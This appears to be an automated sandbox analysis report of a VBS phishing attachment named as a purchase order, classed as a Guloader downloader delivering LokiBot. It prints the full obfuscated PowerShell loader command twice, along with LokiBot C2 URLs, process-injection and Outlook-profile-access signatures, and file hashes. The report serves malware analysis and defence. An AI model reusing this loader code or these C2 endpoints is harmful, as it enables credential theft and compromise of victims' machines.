Analysis
-
max time kernel
119s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
11/03/2024, 14:32
Static task
static1
Behavioral task
behavioral1
Sample
PO 05-03-2024 AKTINA-CDS.vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
PO 05-03-2024 AKTINA-CDS.vbs
Resource
win10v2004-20240226-en
General
-
Target
PO 05-03-2024 AKTINA-CDS.vbs
-
Size
23KB
-
MD5
d6695915f760321b845a2816f656e663
-
SHA1
4b7059d4d43e11a86c3df728f362f4c8446dfc42
-
SHA256
9e544c53dffc7c410220f17bc3a9f96f83f98a2bcdaa882183408d5194bf6a9e
-
SHA512
b5b9f34a1ecbfdc744564699b5588412296aac865de1439e9357af17c7ff64c0ddcd960bfb3adcafd014a052f077535c419d2a96e25d90552951a5152c89c724
-
SSDEEP
384:jrgkau2izS+8ScLLSYxmdIPEwOcFtGiuMcXx5qeBmkgQvZTygL4fKnqvWpsToSFH:jrgkau2iu+8ScLLSYxwIPEwOcFtGiuM1
Malware Config
Extracted
lokibot
https://sempersim.su/c7/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 1920 WScript.exe 6 1920 WScript.exe 17 1136 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 9 drive.google.com 10 drive.google.com 19 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2796 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1136 powershell.exe 2796 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1136 set thread context of 2796 1136 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1212 powershell.exe 1136 powershell.exe 1136 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1136 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1212 powershell.exe Token: SeDebugPrivilege 1136 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1920 wrote to memory of 1212 1920 WScript.exe 28 PID 1920 wrote to memory of 1212 1920 WScript.exe 28 PID 1920 wrote to memory of 1212 1920 WScript.exe 28 PID 1212 wrote to memory of 2872 1212 powershell.exe 30 PID 1212 wrote to memory of 2872 1212 powershell.exe 30 PID 1212 wrote to memory of 2872 1212 powershell.exe 30 PID 1212 wrote to memory of 1136 1212 powershell.exe 32 PID 1212 wrote to memory of 1136 1212 powershell.exe 32 PID 1212 wrote to memory of 1136 1212 powershell.exe 32 PID 1212 wrote to memory of 1136 1212 powershell.exe 32 PID 1136 wrote to memory of 1804 1136 powershell.exe 33 PID 1136 wrote to memory of 1804 1136 powershell.exe 33 PID 1136 wrote to memory of 1804 1136 powershell.exe 33 PID 1136 wrote to memory of 1804 1136 powershell.exe 33 PID 1136 wrote to memory of 2796 1136 powershell.exe 34 PID 1136 wrote to memory of 2796 1136 powershell.exe 34 PID 1136 wrote to memory of 2796 1136 powershell.exe 34 PID 1136 wrote to memory of 2796 1136 powershell.exe 34 PID 1136 wrote to memory of 2796 1136 powershell.exe 34 PID 1136 wrote to memory of 2796 1136 powershell.exe 34 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^03⤵PID:2872
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"3⤵
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^04⤵PID:1804
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- outlook_office_path
- outlook_win_path
PID:2796
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5211771b8306b4df71d2a1099cd2460e9
SHA1d1ab514058c1e2058f0904fef16df876addce6be
SHA2560e4a23b253b8c9a9f73cc646259ddf001c9ac9c089a3727bb78df33552f37628
SHA512e773bb71e4db65c68a5997d380068976facbcab97c03c9f0c2bcd6b0c5b7e821cbb1bc116e78e130805ce45bd9444db9931626168ca767dcd6b54a51d5e5b525
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f162ad07b9edfb1bddeb70b568f2466d
SHA1bc033077f34e28deff7e99265c05a68cf93ab1c0
SHA256e1a611bae1f29f2a467af83c6d42186742a43146eea12eee15d4e2995cd8831d
SHA5128ee786e70fefd98c67f7ddef244ea957e2e82b69207dd10274169e71685eb081c80c7c85898e81c8203ba4a5ab3ffe7bc31369dce1c19b59e845fb1bcb50e4e2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5ddcde6f00e701c39a183b23e268aa671
SHA1fc1bcdc60cc8e9f5e37883539d20ea330edda727
SHA256d88738ba308762b61429ac0b4be38b963ab91db5a91d37b00c1a6a05dd96dfd8
SHA5121e1bd6018888c7ee898fdfb252dac9bb4ae4898c1de254dd2c0fe88593180c03694b0368d97b5f8bf94340c67d04584de9754236d86999c7ce42e431b0f7b68b
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DQXVUI804L86F8K9D92.temp
Filesize7KB
MD5ca01db601cb05e0bfb553367bd49d033
SHA1a68268457978b2ff2d9d5329883b57709adf3f44
SHA25664c45a706f3d8ef66def539981f84534d395e9045359136a6d2c1e46d9e8c4f5
SHA512918c5370e72616e8c9de19fd1798145d9883886a39ab8752e1de4e145f27761ad464319eb17e50d470427d2b82c8fd957a619f5cc515f23f6ace11d74a8d130c